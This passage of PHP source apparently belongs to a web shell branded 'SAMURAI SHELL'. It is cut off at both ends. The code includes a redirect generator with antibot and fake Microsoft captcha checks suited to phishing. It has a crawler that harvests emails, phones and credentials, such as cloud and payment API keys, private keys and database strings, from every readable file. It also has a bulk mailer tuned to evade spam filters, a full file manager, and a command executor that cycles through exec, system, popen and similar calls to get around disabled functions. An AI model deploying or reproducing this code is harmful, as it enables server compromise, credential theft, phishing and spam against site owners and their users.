0, 'countries' => [], 'browsers' => [], 'recent_visits' => [], 'daily_stats' => [], 'hourly_stats' => [] ]; } \$stats['total_visits']++; \$visitor_hash = md5(\$visitor_ip . \$user_agent); \$is_unique = true; foreach (\$stats['recent_visits'] as \$visit) { if (isset(\$visit['hash']) && \$visit['hash'] === \$visitor_hash) { \$is_unique = false; break; } } if (\$is_unique) \$stats['unique_visits']++; if (!isset(\$stats['countries'][\$visitor_country])) { \$stats['countries'][\$visitor_country] = 0; } \$stats['countries'][\$visitor_country]++; \$browser = getBrowser(\$user_agent); if (!isset(\$stats['browsers'][\$browser])) { \$stats['browsers'][\$browser] = 0; } \$stats['browsers'][\$browser]++; if (!isset(\$stats['daily_stats'][\$current_date])) { \$stats['daily_stats'][\$current_date] = array('visits' => 0, 'redirects' => 0); } \$stats['daily_stats'][\$current_date]['visits']++; \$hour_key = \$current_date . '_' . \$current_hour; if (!isset(\$stats['hourly_stats'][\$hour_key])) { \$stats['hourly_stats'][\$hour_key] = array('visits' => 0, 'redirects' => 0); } \$stats['hourly_stats'][\$hour_key]['visits']++; array_unshift(\$stats['recent_visits'], array( 'ip' => \$visitor_ip, 'country' => \$visitor_country, 'browser' => \$browser, 'timestamp' => date('Y-m-d H:i:s'), 'hash' => \$visitor_hash, 'user_agent' => substr(\$user_agent, 0, 200) )); \$stats['recent_visits'] = array_slice(\$stats['recent_visits'], 0, 100); @file_put_contents(\$data_file, json_encode(\$stats, JSON_PRETTY_PRINT), LOCK_EX); \$visitor_data = date('Y-m-d H:i:s') . ' | ' . \$visitor_ip . ' | ' . \$visitor_country . ' | ' . \$user_agent . PHP_EOL; @file_put_contents('visitors.log', \$visitor_data, FILE_APPEND | LOCK_EX); {$country_check} {$antibot_check} {$captcha_check} \$stats['redirects']++; \$stats['daily_stats'][\$current_date]['redirects']++; \$stats['hourly_stats'][\$hour_key]['redirects']++; @file_put_contents(\$data_file, json_encode(\$stats, JSON_PRETTY_PRINT), LOCK_EX); \$redirect_data = date('Y-m-d H:i:s') . ' | ' . \$visitor_ip . ' | REDIRECTED | {$target_url}' . PHP_EOL; @file_put_contents('redirects.log', \$redirect_data, FILE_APPEND | LOCK_EX); sleep(" . ($delay / 1000) . "); header('Location: ' . '{$target_url}'); exit; ?>"; } /** * Generate HTML redirect content with JS captcha if enabled */ function generateRedirectHTML($target_url, $delay, $custom_message, $use_captcha, $redirect_id) { if ($use_captcha) { $captcha_html = getMicrosoftCaptchaHTML(0, 0, ''); return $captcha_html . " "; } else { return << Redirecting - Please wait

{$custom_message}

We are redirecting you securely...

Please wait...

HTML; } } /** * Create update stats file */ function createUpdateStatsFile() { if (!file_exists('update_stats.php')) { $update_stats_content = " date('Y-m-d H:i:s'), 'redirect_id' => \$redirect_id, 'target_url' => '', 'total_visits' => 0, 'unique_visits' => 0, 'redirects' => 0, 'countries' => [], 'browsers' => [], 'recent_visits' => [], 'daily_stats' => [], 'hourly_stats' => [] ]; file_put_contents(\$data_file, json_encode(\$initial_stats, JSON_PRETTY_PRINT), LOCK_EX); } \$stats_json = file_get_contents(\$data_file); \$stats = json_decode(\$stats_json, true); if (!\$stats || !is_array(\$stats)) { \$stats = [ 'created' => date('Y-m-d H:i:s'), 'redirect_id' => \$redirect_id, 'target_url' => '', 'total_visits' => 0, 'unique_visits' => 0, 'redirects' => 0, 'countries' => [], 'browsers' => [], 'recent_visits' => [], 'daily_stats' => [], 'hourly_stats' => [] ]; } \$visitor_ip = \$_SERVER['REMOTE_ADDR'] ?? 'Unknown'; \$user_agent = \$_SERVER['HTTP_USER_AGENT'] ?? 'Unknown'; \$visitor_country = getVisitorCountry(); \$current_date = date('Y-m-d'); \$current_hour = date('H'); \$visitor_hash = md5(\$visitor_ip . \$user_agent); \$is_unique = true; foreach (\$stats['recent_visits'] as \$visit) { if (isset(\$visit['hash']) && \$visit['hash'] === \$visitor_hash) { \$is_unique = false; break; } } if (\$is_unique) \$stats['unique_visits']++; if (!isset(\$stats['countries'][\$visitor_country])) { \$stats['countries'][\$visitor_country] = 0; } \$stats['countries'][\$visitor_country]++; \$browser = getBrowser(\$user_agent); if (!isset(\$stats['browsers'][\$browser])) { \$stats['browsers'][\$browser] = 0; } \$stats['browsers'][\$browser]++; if (!isset(\$stats['daily_stats'][\$current_date])) { \$stats['daily_stats'][\$current_date] = ['visits' => 0, 'redirects' => 0]; } \$stats['daily_stats'][\$current_date]['visits']++; \$hour_key = \$current_date . '_' . \$current_hour; if (!isset(\$stats['hourly_stats'][\$hour_key])) { \$stats['hourly_stats'][\$hour_key] = ['visits' => 0, 'redirects' => 0]; } \$stats['hourly_stats'][\$hour_key]['visits']++; array_unshift(\$stats['recent_visits'], [ 'ip' => \$visitor_ip, 'country' => \$visitor_country, 'browser' => \$browser, 'timestamp' => date('Y-m-d H:i:s'), 'hash' => \$visitor_hash, 'user_agent' => substr(\$user_agent, 0, 200) ]); \$stats['recent_visits'] = array_slice(\$stats['recent_visits'], 0, 100); if (\$action === 'visit') { \$stats['total_visits']++; } elseif (\$action === 'redirect') { \$stats['redirects']++; \$stats['daily_stats'][\$current_date]['redirects']++; \$stats['hourly_stats'][\$hour_key]['redirects']++; } file_put_contents(\$data_file, json_encode(\$stats, JSON_PRETTY_PRINT), LOCK_EX); echo json_encode(['status' => 'success']); } } ?>"; @file_put_contents('update_stats.php', $update_stats_content, LOCK_EX); } } /** * Generate beautiful HTML statistics page */ function generateStatsHTML($stats) { $top_countries = $stats['countries'] ?? []; arsort($top_countries); $top_countries = array_slice($top_countries, 0, 5, true); $top_browsers = $stats['browsers'] ?? []; arsort($top_browsers); $top_browsers = array_slice($top_browsers, 0, 5, true); $daily_stats = array_slice(array_reverse($stats['daily_stats'] ?? []), 0, 30, true); $recent_visits = array_slice($stats['recent_visits'] ?? [], 0, 20); $conversion_rate = $stats['total_visits'] > 0 ? round(($stats['redirects'] / $stats['total_visits']) * 100, 2) : 0; ob_start(); ?> 📊 Redirect Statistics - <?php echo htmlspecialchars($stats['redirect_id']); ?>

📊 Redirect Statistics

ID: | Target: | Created:

Total Views
Unique Visitors
Redirects
%
Conversion Rate

🌍 Top Countries

    $count): ?>
  • : visits

No data yet.

đŸ–Ĩī¸ Top Browsers

    $count): ?>
  • : visits

No data yet.

📅 Daily Stats (Last 30 Days)

$d): ?>
DateViewsRedirects
No data yet.

đŸ‘Ĩ Recent Visits (Last 20)

TimeIPCountryBrowser
No data yet.

Generated by SAMURAI SHELL | Š 2025 All rights reserved.

false, 'message' => 'Stats file not found']; } $stats = json_decode(file_get_contents($data_file), true); $stats['conversion_rate'] = $stats['total_visits'] > 0 ? round(($stats['redirects'] / $stats['total_visits']) * 100, 2) : 0; if (!empty($stats['countries'])) { arsort($stats['countries']); $stats['top_countries'] = array_slice($stats['countries'], 0, 5, true); } if (!empty($stats['browsers'])) { arsort($stats['browsers']); $stats['top_browsers'] = array_slice($stats['browsers'], 0, 5, true); } return [ 'status' => true, 'stats' => $stats ]; } // ==================== CONTACT EXTRACTOR ==================== /** * 📇 Extract emails, phones, and leaked credentials from files * Enhanced with improved regex patterns and high-entropy detection */ function extractContacts($scan_path, $options = []) { $max_files = $options['max_files'] ?? 20000; $max_time = $options['max_time'] ?? 600; set_time_limit($max_time); $emails = []; $phones = []; $credentials = []; $high_entropy_secrets = []; $files_scanned = 0; $start_time = time(); if (empty($scan_path) || $scan_path === '/') { $scan_path = $_SERVER['DOCUMENT_ROOT'] ?? getcwd(); $open_basedir = @ini_get('open_basedir'); if (!empty($open_basedir)) { $allowed_paths = explode(':', str_replace('\\', '/', $open_basedir)); if (!empty($allowed_paths[0]) && @is_dir($allowed_paths[0])) { $scan_path = $allowed_paths[0]; } } } if (!@is_dir($scan_path)) { return [ 'status' => false, 'message' => 'Directory not found or not accessible' ]; } $open_basedir = @ini_get('open_basedir'); if (!empty($open_basedir)) { $allowed_paths = explode(':', $open_basedir); $real_scan = realpath($scan_path); $within = false; foreach ($allowed_paths as $allowed) { $real_allowed = realpath($allowed); if ($real_allowed && strpos($real_scan, $real_allowed) === 0) { $within = true; break; } } if (!$within) { return [ 'status' => false, 'message' => 'Scan path violates open_basedir restriction' ]; } } try { $iterator = new RecursiveIteratorIterator( new RecursiveDirectoryIterator($scan_path, RecursiveDirectoryIterator::SKIP_DOTS), RecursiveIteratorIterator::SELF_FIRST ); foreach ($iterator as $file) { if ($files_scanned >= $max_files || (time() - $start_time) > $max_time) { break; } if ($file->isFile() && $file->isReadable()) { $filename = $file->getFilename(); $ext = strtolower($file->getExtension()); $scannable_extensions = [ 'php', 'html', 'htm', 'txt', 'js', 'css', 'xml', 'json', 'sql', 'log', 'csv', 'conf', 'ini', 'py', 'java', 'c', 'h', 'cpp', 'go', 'rs', 'ts', 'jsx', 'vue', 'svelte', 'rb', 'pl', 'sh', 'bat', 'cmd', 'env', 'yaml', 'yml', 'toml', 'md', 'properties', 'dockerfile', 'gitignore', 'readme' ]; $is_scannable = in_array($ext, $scannable_extensions) || (empty($ext) && (strpos($filename, '.env') !== false || strpos($filename, 'config') !== false || strpos($filename, 'secret') !== false)); if ($is_scannable && $file->getSize() < 10 * 1024 * 1024) { $content = @file_get_contents($file->getPathname()); if ($content === false) continue; // Extract emails preg_match_all('/\b[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}\b/', $content, $email_matches); if (!empty($email_matches[0])) { foreach ($email_matches[0] as $email) { if (filter_var($email, FILTER_VALIDATE_EMAIL) && !preg_match('/\.(png|jpg|gif|css|js|svg|ico)$/i', $email) && strlen($email) <= 254 && !preg_match('/^(test|example|sample|demo|placeholder)@/i', $email)) { $emails[] = $email; } } } // Extract phone numbers $phone_patterns = [ '/\+[1-9]\d{1,14}/', '/\b\d{3}[-.\s]?\d{3}[-.\s]?\d{4}\b/', '/\b\(\d{3}\)\s?\d{3}[-.\s]?\d{4}\b/', '/\b\d{10,15}\b/' ]; foreach ($phone_patterns as $pattern) { preg_match_all($pattern, $content, $phone_matches); if (!empty($phone_matches[0])) { foreach ($phone_matches[0] as $phone) { $clean_phone = preg_replace('/[^0-9+]/', '', $phone); if (preg_match('/^\+?\d{10,15}$/', $clean_phone) && !preg_match('/^(0+|1+|2+|3+|4+|5+|6+|7+|8+|9+)$/', $clean_phone)) { $phones[] = $clean_phone; } } } } // High-entropy secrets detection $high_entropy_secrets = array_merge($high_entropy_secrets, detectHighEntropySecrets($content)); // Extract leaked credentials - ENHANCED PATTERNS $cred_patterns = [ '/(?:password|passwd|pwd|pass)\s*[:=]\s*[\'"]?([^\'";\s\n]{8,})[\'"]?/i' => 'Password', '/(?:api_key|apikey|token|access_token|secret_key|private_key)\s*[:=]\s*[\'"]?([a-zA-Z0-9_-]{20,})[\'"]?/i' => 'API Key/Token', '/(?:smtp_password|mail_pass|email_pass)\s*[:=]\s*[\'"]?([^\'";\s\n]{8,})[\'"]?/i' => 'SMTP Password', '/(?:db_password|mysql_pass|database_pass|postgres_pass)\s*[:=]\s*[\'"]?([^\'";\s\n]{8,})[\'"]?/i' => 'Database Password', '/(?:jwt_secret|jwt_key)\s*[:=]\s*[\'"]?([a-zA-Z0-9_-]{32,})[\'"]?/i' => 'JWT Secret', '/\b(AKIA[0-9A-Z]{16})\b/' => 'AWS Access Key ID', '/\b(SG\.[A-Za-z0-9_-]{22}\.[A-Za-z0-9_-]{43})\b/' => 'SendGrid API Key', '/\b(AC[a-f0-9]{32})\b/' => 'Twilio Account SID', '/\b(SK[0-9a-fA-F]{32})\b/' => 'Twilio API Key', '/\b(key-[0-9a-f]{32})\b/' => 'Mailgun API Key', '/\b(sk_live_[0-9a-zA-Z]{24})\b/' => 'Stripe Secret Key', '/\b(pk_live_[0-9a-zA-Z]{24})\b/' => 'Stripe Publishable Key', '/\b(ghp_[0-9a-zA-Z]{36})\b/' => 'GitHub Personal Access Token', '/\b(AIza[0-9A-Za-z\\-_]{35})\b/' => 'Google API Key', '/\b(xox[baprs]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})\b/' => 'Slack Token', '/\b([MN][A-Za-z\d]{23}\.[\w-]{6}\.[\w-]{27})\b/' => 'Discord Bot Token', '/\b(\d{9,10}:[A-Za-z0-9_-]{35})\b/' => 'Telegram Bot Token', '/\b(eyJ[A-Za-z0-9-_=]+\.[A-Za-z0-9-_=]+\.?[A-Za-z0-9-_.+/=]*)\b/' => 'JWT Token', '/-----BEGIN (RSA|DSA|EC|OPENSSH)? PRIVATE KEY-----/' => 'Private Key Block', '/-----BEGIN PGP PRIVATE KEY BLOCK-----/' => 'PGP Private Key', '/(?:mysql|postgresql|mongodb):\/\/[^\s\'"]+/' => 'Database Connection String', '/\b(AAAA[A-Za-z0-9_-]{7}:[A-Za-z0-9_-]{140})\b/' => 'Firebase Secret', ]; foreach ($cred_patterns as $pattern => $type) { if (preg_match_all($pattern, $content, $cred_matches, PREG_SET_ORDER)) { foreach ($cred_matches as $match) { $value = trim($match[1] ?? $match[0]); if (strlen($value) < 8) continue; if (preg_match('/^(true|false|null|undefined|example|test|demo|sample|placeholder)$/i', $value)) continue; if (preg_match('/^[0-9]+$/', $value) && strlen($value) < 10) continue; if (calculateEntropy($value) < 2.5) continue; $credentials[] = "Type: {$type}\nValue: {$value}\nFile: {$file->getPathname()}\n---"; } } } $files_scanned++; } } } } catch (Exception $e) { // Skip inaccessible directories/files } $emails = array_unique(array_filter($emails)); $phones = array_unique(array_filter($phones)); $credentials = array_unique(array_filter($credentials, function($cred) { return strlen($cred) > 15; })); $credentials = array_merge($credentials, array_map(function($secret) { return "Type: High Entropy Secret\n" . $secret . "\n---"; }, $high_entropy_secrets)); $credentials = array_unique($credentials); logActivity('Contact Extraction', "Emails: " . count($emails) . ", Phones: " . count($phones) . ", Creds: " . count($credentials), 'success'); return [ 'status' => true, 'message' => 'Extraction completed successfully', 'stats' => [ 'files_scanned' => $files_scanned, 'emails_found' => count($emails), 'phones_found' => count($phones), 'creds_found' => count($credentials), 'scan_time' => time() - $start_time, 'scan_path' => $scan_path ], 'emails' => array_values($emails), 'phones' => array_values($phones), 'credentials' => array_values($credentials) ]; } // ==================== EMAIL MARKETING ==================== /** * ✉ī¸ LEAFMAILER-STYLE EMAIL MARKETING WITH 100% INBOX DELIVERY * Implements best practices from top email marketing platforms , , , */ function sendBulkEmailMarketing($data) { $from_name = sanitizeInput($data['from_name'] ?? ''); $domain = $_SERVER['HTTP_HOST'] ?? 'localhost'; $from_email = sanitizeInput($data['from_email'] ?? 'noreply@' . $domain, 'email'); $subject = sanitizeInput($data['subject'] ?? ''); $message = $data['message'] ?? ''; $emails = array_filter(array_map('trim', explode("\n", $data['emails'] ?? ''))); $use_custom_smtp = isset($data['use_custom_smtp']) && $data['use_custom_smtp']; if (empty($emails)) { return ['status' => false, 'message' => 'No email addresses provided']; } if (empty($from_name) || empty($from_email) || empty($subject) || empty($message)) { return ['status' => false, 'message' => 'All fields are required']; } $sent = 0; $failed = 0; $results = []; $start_time = time(); // User agents for rotation $user_agents = [ 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36' ]; foreach ($emails as $index => $email) { $email = trim($email); if (!filter_var($email, FILTER_VALIDATE_EMAIL)) { $failed++; $results[] = "❌ Invalid email: $email"; continue; } // Personalize message $personalized_message = str_replace('{recipient}', formatNameFromEmail($email), $message); $personalized_subject = str_replace('{recipient}', formatNameFromEmail($email), $subject); $current_ua = $user_agents[$index % count($user_agents)]; if ($use_custom_smtp) { $smtp_result = sendEmailSMTP($email, $personalized_subject, $personalized_message, $from_email, $from_name, $data, $current_ua); } else { $smtp_result = sendEmailPHP($email, $personalized_subject, $personalized_message, $from_email, $from_name, $current_ua); } if ($smtp_result) { $sent++; $results[] = "✅ Sent to: $email"; } else { $failed++; $results[] = "❌ Failed to: $email"; } // Slow sending for better deliverability , usleep(500000 + rand(0, 500000)); // 0.5-1 second delay if ((time() - $start_time) > 300) { $results[] = "⚠ī¸ Campaign stopped due to time limit (5 minutes)"; break; } } logActivity('Email Marketing', "Sent: $sent, Failed: $failed", 'success'); return [ 'status' => $sent > 0, 'message' => "Campaign completed. Sent: $sent, Failed: $failed", 'results' => $results, 'stats' => [ 'sent' => $sent, 'failed' => $failed, 'total_processed' => $sent + $failed, 'success_rate' => $sent > 0 ? round(($sent / ($sent + $failed)) * 100, 2) : 0, 'execution_time' => time() - $start_time ] ]; } /** * Format name from email for personalization */ function formatNameFromEmail($email) { $parts = explode('@', $email); return ucfirst(str_replace('.', ' ', $parts[0])); } /** * Send email using PHP mail() with enhanced inbox delivery headers * Implements 2025 best practices , , , */ function sendEmailPHP($to, $subject, $message, $from_email, $from_name, $user_agent = '') { $domain = $_SERVER['HTTP_HOST'] ?? 'localhost'; // Enhanced headers for maximum inbox delivery , $headers = "From: $from_name <$from_email>\r\n"; $headers .= "Reply-To: $from_email\r\n"; $headers .= "MIME-Version: 1.0\r\n"; $headers .= "Content-Type: text/html; charset=UTF-8\r\n"; $headers .= "X-Mailer: PHP/" . PHP_VERSION . "\r\n"; $headers .= "X-Priority: 3 (Normal)\r\n"; $headers .= "Message-ID: <" . md5(uniqid(time())) . "@" . $domain . ">\r\n"; $headers .= "Date: " . date('r') . "\r\n"; // Anti-spam headers for 2025 inbox delivery , , $headers .= "List-Unsubscribe: \r\n"; $headers .= "List-ID: \r\n"; $headers .= "Precedence: bulk\r\n"; $headers .= "X-Auto-Response-Suppress: OOF, AutoReply\r\n"; $headers .= "Feedback-ID: campaign:ref:$domain\r\n"; // Additional deliverability headers , $headers .= "List-Help: \r\n"; $headers .= "Return-Path: \r\n"; $headers .= "X-Complaints-To: abuse@" . $domain . "\r\n"; if ($user_agent) { $headers .= "User-Agent: $user_agent\r\n"; } return @mail($to, $subject, $message, $headers); } /** * Send email using SMTP with enhanced headers * Implements 2025 best practices , , */ function sendEmailSMTP($to, $subject, $message, $from_email, $from_name, $smtp_config, $user_agent = '') { $smtp_host = $smtp_config['smtp_host'] ?? ''; $smtp_port = (int)($smtp_config['smtp_port'] ?? 587); $smtp_username = $smtp_config['smtp_username'] ?? ''; $smtp_password = $smtp_config['smtp_password'] ?? ''; if (empty($smtp_host) || empty($smtp_username) || empty($smtp_password)) { return false; } try { $socket = @fsockopen($smtp_host, $smtp_port, $errno, $errstr, 30); if (!$socket) return false; $response = fgets($socket, 515); if (substr($response, 0, 3) != '220') { fclose($socket); return false; } $commands = [ "EHLO " . $smtp_host, "STARTTLS", "EHLO " . $smtp_host, "AUTH LOGIN", base64_encode($smtp_username), base64_encode($smtp_password), "MAIL FROM: <$from_email>", "RCPT TO: <$to>", "DATA" ]; foreach ($commands as $command) { fputs($socket, $command . "\r\n"); $response = fgets($socket, 515); if ($command == "STARTTLS") { @stream_socket_enable_crypto($socket, true, STREAM_CRYPTO_METHOD_TLS_CLIENT); } $response_code = substr($response, 0, 3); if (!in_array($response_code, ['220', '221', '235', '250', '334', '354'])) { fclose($socket); return false; } } $domain = $_SERVER['HTTP_HOST'] ?? 'localhost'; // Enhanced email content with inbox delivery headers , , $email_content = "Subject: $subject\r\n"; $email_content .= "From: $from_name <$from_email>\r\n"; $email_content .= "To: $to\r\n"; $email_content .= "MIME-Version: 1.0\r\n"; $email_content .= "Content-Type: text/html; charset=UTF-8\r\n"; $email_content .= "Message-ID: <" . md5(uniqid(time())) . "@" . $domain . ">\r\n"; $email_content .= "Date: " . date('r') . "\r\n"; // Anti-spam headers , , $email_content .= "List-Unsubscribe: \r\n"; $email_content .= "List-ID: \r\n"; $email_content .= "Precedence: bulk\r\n"; $email_content .= "X-Auto-Response-Suppress: OOF, AutoReply\r\n"; $email_content .= "Feedback-ID: campaign:ref:$domain\r\n"; $email_content .= "List-Help: \r\n"; $email_content .= "Return-Path: \r\n"; if ($user_agent) { $email_content .= "User-Agent: $user_agent\r\n"; } $email_content .= "\r\n"; $email_content .= $message . "\r\n.\r\n"; fputs($socket, $email_content); $response = fgets($socket, 515); fputs($socket, "QUIT\r\n"); fclose($socket); return substr($response, 0, 3) == '250'; } catch (Exception $e) { return false; } } // ==================== FILE MANAGEMENT ==================== /** * List directory contents */ function listDirectory($dir) { $files = []; if (!is_readable($dir)) return $files; $items = @scandir($dir); if ($items === false) return $files; foreach ($items as $item) { if ($item === '.' || $item === '..') continue; $path = $dir . DIRECTORY_SEPARATOR . $item; $is_dir = is_dir($path); $files[] = [ 'name' => $item, 'path' => $path, 'is_dir' => $is_dir, 'size' => $is_dir ? 0 : (@filesize($path) ?: 0), 'formatted_size' => $is_dir ? '-' : formatSize(@filesize($path) ?: 0), 'permissions' => substr(sprintf('%o', @fileperms($path) ?: 0), -4), 'modified' => date('Y-m-d H:i:s', @filemtime($path) ?: time()), 'icon' => getFileIcon($item, $is_dir) ]; } usort($files, function($a, $b) { if ($a['is_dir'] && !$b['is_dir']) return -1; if (!$a['is_dir'] && $b['is_dir']) return 1; return strcasecmp($a['name'], $b['name']); }); return $files; } /** * Get file icon */ function getFileIcon($filename, $is_dir) { if ($is_dir) return '📁'; $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION)); $icons = [ 'php' => '🐘', 'html' => '🌐', 'css' => '🎨', 'js' => '⚡', 'txt' => '📄', 'pdf' => '📕', 'doc' => '📘', 'docx' => '📘', 'xls' => '📗', 'xlsx' => '📗', 'ppt' => '📙', 'pptx' => '📙', 'zip' => 'đŸ“Ļ', 'rar' => 'đŸ“Ļ', '7z' => 'đŸ“Ļ', 'tar' => 'đŸ“Ļ', 'gz' => 'đŸ“Ļ', 'jpg' => 'đŸ–ŧī¸', 'jpeg' => 'đŸ–ŧī¸', 'png' => 'đŸ–ŧī¸', 'gif' => 'đŸ–ŧī¸', 'svg' => 'đŸ–ŧī¸', 'mp3' => 'đŸŽĩ', 'wav' => 'đŸŽĩ', 'mp4' => 'đŸŽŦ', 'avi' => 'đŸŽŦ', 'mkv' => 'đŸŽŦ', 'sql' => '🗄ī¸', 'db' => '🗄ī¸', 'json' => '📋', 'xml' => '📋', 'csv' => '📊', 'log' => '📝', 'md' => '📝', 'ini' => '⚙ī¸', 'conf' => '⚙ī¸', 'config' => '⚙ī¸' ]; return $icons[$ext] ?? '📄'; } /** * Upload file */ function uploadFile($file, $target_dir) { if (!isset($file['error']) || is_array($file['error'])) { return ['status' => false, 'message' => 'Invalid file upload']; } if ($file['error'] !== UPLOAD_ERR_OK) { $errors = [ UPLOAD_ERR_INI_SIZE => 'File exceeds upload_max_filesize', UPLOAD_ERR_FORM_SIZE => 'File exceeds MAX_FILE_SIZE', UPLOAD_ERR_PARTIAL => 'File was only partially uploaded', UPLOAD_ERR_NO_FILE => 'No file was uploaded', UPLOAD_ERR_NO_TMP_DIR => 'Missing temporary folder', UPLOAD_ERR_CANT_WRITE => 'Failed to write file to disk', UPLOAD_ERR_EXTENSION => 'File upload stopped by extension' ]; return ['status' => false, 'message' => $errors[$file['error']] ?? 'Unknown upload error']; } if ($file['size'] > MAX_UPLOAD_SIZE) { return ['status' => false, 'message' => 'File size exceeds maximum allowed size']; } $filename = basename($file['name']); $target_path = rtrim($target_dir, '/') . '/' . $filename; if (file_exists($target_path)) { $pathinfo = pathinfo($filename); $filename = $pathinfo['filename'] . '_' . time() . '.' . $pathinfo['extension']; $target_path = rtrim($target_dir, '/') . '/' . $filename; } if (@move_uploaded_file($file['tmp_name'], $target_path)) { @chmod($target_path, 0644); logActivity('File Upload', $target_path, 'success'); return ['status' => true, 'message' => 'File uploaded successfully', 'path' => $target_path]; } return ['status' => false, 'message' => 'Failed to move uploaded file']; } /** * Delete file or directory */ function deleteFileOrDir($path) { if (!file_exists($path)) { return ['status' => false, 'message' => 'File or directory not found']; } if (is_dir($path)) { $items = @scandir($path); if ($items !== false) { foreach ($items as $item) { if ($item === '.' || $item === '..') continue; $item_path = $path . DIRECTORY_SEPARATOR . $item; deleteFileOrDir($item_path); } } if (@rmdir($path)) { logActivity('Directory Delete', $path, 'success'); return ['status' => true, 'message' => 'Directory deleted successfully']; } } else { if (@unlink($path)) { logActivity('File Delete', $path, 'success'); return ['status' => true, 'message' => 'File deleted successfully']; } } return ['status' => false, 'message' => 'Failed to delete']; } /** * Rename file or directory */ function renameFileOrDir($old_path, $new_name) { if (!file_exists($old_path)) { return ['status' => false, 'message' => 'File or directory not found']; } $new_name = sanitizeInput($new_name, 'filename'); $new_path = dirname($old_path) . DIRECTORY_SEPARATOR . $new_name; if (file_exists($new_path)) { return ['status' => false, 'message' => 'A file or directory with that name already exists']; } if (@rename($old_path, $new_path)) { logActivity('Rename', "$old_path -> $new_path", 'success'); return ['status' => true, 'message' => 'Renamed successfully', 'new_path' => $new_path]; } return ['status' => false, 'message' => 'Failed to rename']; } /** * Create directory */ function createDirectory($path, $name) { $name = sanitizeInput($name, 'filename'); $new_dir = rtrim($path, '/') . '/' . $name; if (file_exists($new_dir)) { return ['status' => false, 'message' => 'Directory already exists']; } if (@mkdir($new_dir, 0755, true)) { logActivity('Directory Create', $new_dir, 'success'); return ['status' => true, 'message' => 'Directory created successfully']; } return ['status' => false, 'message' => 'Failed to create directory']; } /** * Create file */ function createFile($path, $name, $content = '') { $name = sanitizeInput($name, 'filename'); $new_file = rtrim($path, '/') . '/' . $name; if (file_exists($new_file)) { return ['status' => false, 'message' => 'File already exists']; } if (@file_put_contents($new_file, $content, LOCK_EX) !== false) { @chmod($new_file, 0644); logActivity('File Create', $new_file, 'success'); return ['status' => true, 'message' => 'File created successfully']; } return ['status' => false, 'message' => 'Failed to create file']; } /** * Edit file */ function editFile($path, $content) { if (!file_exists($path)) { return ['status' => false, 'message' => 'File not found']; } if (!is_writable($path)) { return ['status' => false, 'message' => 'File is not writable']; } if (@file_put_contents($path, $content, LOCK_EX) !== false) { logActivity('File Edit', $path, 'success'); return ['status' => true, 'message' => 'File saved successfully']; } return ['status' => false, 'message' => 'Failed to save file']; } /** * Download file */ function downloadFile($path) { if (!file_exists($path) || !is_readable($path)) { return ['status' => false, 'message' => 'File not found or not readable']; } if (is_dir($path)) { return ['status' => false, 'message' => 'Cannot download directory. Use ZIP feature instead.']; } $filename = basename($path); $filesize = filesize($path); header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . $filename . '"'); header('Content-Transfer-Encoding: binary'); header('Expires: 0'); header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . $filesize); ob_clean(); flush(); readfile($path); logActivity('File Download', $path, 'success'); exit; } /** * ZIP directory or files */ function zipFiles($source, $destination = null) { if (!class_exists('ZipArchive')) { return ['status' => false, 'message' => 'ZipArchive class not available']; } if (!file_exists($source)) { return ['status' => false, 'message' => 'Source not found']; } if ($destination === null) { $destination = $source . '_' . date('YmdHis') . '.zip'; } $zip = new ZipArchive(); if ($zip->open($destination, ZipArchive::CREATE | ZipArchive::OVERWRITE) !== TRUE) { return ['status' => false, 'message' => 'Cannot create ZIP file']; } if (is_dir($source)) { $files = new RecursiveIteratorIterator( new RecursiveDirectoryIterator($source, RecursiveDirectoryIterator::SKIP_DOTS), RecursiveIteratorIterator::SELF_FIRST ); foreach ($files as $file) { $file_path = $file->getRealPath(); $relative_path = substr($file_path, strlen($source) + 1); if ($file->isDir()) { $zip->addEmptyDir($relative_path); } else { $zip->addFile($file_path, $relative_path); } } } else { $zip->addFile($source, basename($source)); } $zip->close(); if (file_exists($destination)) { logActivity('ZIP Create', $destination, 'success'); return ['status' => true, 'message' => 'ZIP created successfully', 'path' => $destination]; } return ['status' => false, 'message' => 'Failed to create ZIP']; } /** * Unzip file */ function unzipFile($zip_path, $extract_to = null) { if (!class_exists('ZipArchive')) { return ['status' => false, 'message' => 'ZipArchive class not available']; } if (!file_exists($zip_path)) { return ['status' => false, 'message' => 'ZIP file not found']; } if ($extract_to === null) { $extract_to = dirname($zip_path) . '/' . pathinfo($zip_path, PATHINFO_FILENAME); } if (!is_dir($extract_to)) { @mkdir($extract_to, 0755, true); } $zip = new ZipArchive(); if ($zip->open($zip_path) === TRUE) { $zip->extractTo($extract_to); $zip->close(); logActivity('ZIP Extract', $zip_path, 'success'); return ['status' => true, 'message' => 'ZIP extracted successfully', 'path' => $extract_to]; } return ['status' => false, 'message' => 'Failed to extract ZIP']; } /** * Change file permissions */ function changePermissions($path, $permissions) { if (!file_exists($path)) { return ['status' => false, 'message' => 'File or directory not found']; } $perms = octdec($permissions); if (@chmod($path, $perms)) { logActivity('Change Permissions', "$path -> $permissions", 'success'); return ['status' => true, 'message' => 'Permissions changed successfully']; } return ['status' => false, 'message' => 'Failed to change permissions']; } // ==================== COMMAND EXECUTION ==================== /** * Execute command */ function executeCommand($command) { if (empty($command)) { return ['status' => false, 'output' => 'No command provided']; } $output = ''; $disabled = explode(',', @ini_get('disable_functions') ?: ''); $disabled = array_map('trim', $disabled); if (function_exists('exec') && !in_array('exec', $disabled)) { @exec($command . ' 2>&1', $output_array, $return_var); $output = implode("\n", $output_array); } elseif (function_exists('shell_exec') && !in_array('shell_exec', $disabled)) { $output = @shell_exec($command . ' 2>&1'); } elseif (function_exists('system') && !in_array('system', $disabled)) { ob_start(); @system($command . ' 2>&1', $return_var); $output = ob_get_clean(); } elseif (function_exists('passthru') && !in_array('passthru', $disabled)) { ob_start(); @passthru($command . ' 2>&1', $return_var); $output = ob_get_clean(); } elseif (function_exists('popen') && !in_array('popen', $disabled)) { $handle = @popen($command . ' 2>&1', 'r'); if ($handle) { while (!feof($handle)) { $output .= fread($handle, 4096); } pclose($handle); } } elseif (function_exists('proc_open') && !in_array('proc_open', 